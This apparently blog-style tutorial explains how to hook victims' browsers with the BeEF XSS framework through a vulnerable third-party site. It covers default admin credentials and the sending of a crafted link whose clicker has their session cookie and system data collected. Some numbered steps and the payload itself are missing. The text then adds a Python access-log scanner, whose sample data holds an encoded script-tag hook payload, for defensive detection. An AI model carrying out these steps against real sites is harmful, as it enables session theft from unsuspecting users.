I hope you can learn by yourselves after reading this tutorial. The same happens in real life: do not expect to master this if you only learn everything in school, sitting behind a desk. You need to dig for yourselves, try, try and try again, and push yourself far out of your comfort zone. Let's start the tutorial.
Step by step Hacking Using Beef XSS Framework
1. Before we start, here are the details of the setup I use in this tutorial.
OS: Backtrack 5
Already have XSS vulnerable website as a mediator
OS: Windows 7 Ultimate
If you get an error, maybe you haven't installed the BeEF XSS framework.
3. After you run BeEF in step two, a window will pop up and tell you the username and password to log in to the BeEF admin panel. By default, the username is beef and the password is beef. The BeEF control panel should look like this:
As the picture above shows, we must inject the hook URL address into the XSS vulnerable website.
6. Because I already have XSS vulnerable websites from the last tutorial about finding simple XSS vulnerabilities, I just use one of them. For the next step, I have also already prepared the code to inject into the search box.
Next, the attacker copies the URL together with the malicious script inside it and sends it to the victim. This is what the URL looks like:
The picture above means that the victim with IP 192.168.160.104 has already clicked the malicious link with mediator xxx.com.
8. When we move to the BeEF XSS framework control panel, the control panel has recorded some activity there.
9. A lot of information is also available there, including the session cookie, system information, etc.
Hope it's useful.
1. XSS can directly attack the users that visit a website.
2. Do not click a link that you don't know.
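From the defender's side, the link described above (a search URL with a script tag inside a parameter) leaves a trace in the mediator site's access log. The following is an added example, not code from the original tutorial: it scans combined-format log lines for query parameters that decode to a script tag loading from another host. The log lines, the /search.php path, the q parameter and the 203.0.113.5 script host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# <script> tag whose src is an absolute or protocol-relative URL.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*\bsrc\s*=\s*[\"']?\s*((?:https?:)?//[^\s\"'>]+)", re.I)
# Client IP and request target from a combined-format access log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log (assumed path, parameter and script host).
SAMPLE_LOG = [
    '192.168.160.104 - - [10/Oct/2012:13:55:36 +0000] "GET /search.php?q=%3Cscript%20src%3Dhttp%3A%2F%2F203.0.113.5%2Fhook.js%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
    '192.168.160.105 - - [10/Oct/2012:13:56:02 +0000] "GET /search.php?q=backtrack+5 HTTP/1.1" 200 498',
    # Double-encoded variant with a protocol-relative src.
    '192.168.160.106 - - [10/Oct/2012:13:57:41 +0000] "GET /search.php?q=%253Cscript%2520src%253D%2F%2F203.0.113.5%2Fhook.js%253E HTTP/1.1" 200 512',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_script_injection(url):
    """Return (parameter, script_host) for query values carrying an off-site <script src>."""
    parts = urlsplit(url)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        match = SCRIPT_SRC.search(fully_decode(value))
        if match:
            script_host = urlsplit(match.group(1)).hostname
            if script_host != parts.hostname:  # hostname is None for path-only targets
                hits.append((name, script_host))
    return hits

def scan_access_log(lines):
    """Return (client_ip, parameter, script_host) for each suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            client, target = m.groups()
            alerts += [(client, p, h) for p, h in find_script_injection(target)]
    return alerts

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print("possible XSS hook injection:", alert)
```

A hit here means a visitor followed such a link, so the lasting fix is still to HTML-encode the search term before the site echoes it back.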
We will continue the XSS attack tutorial series in the next post, so stay tuned. If you find this post useful, spread it!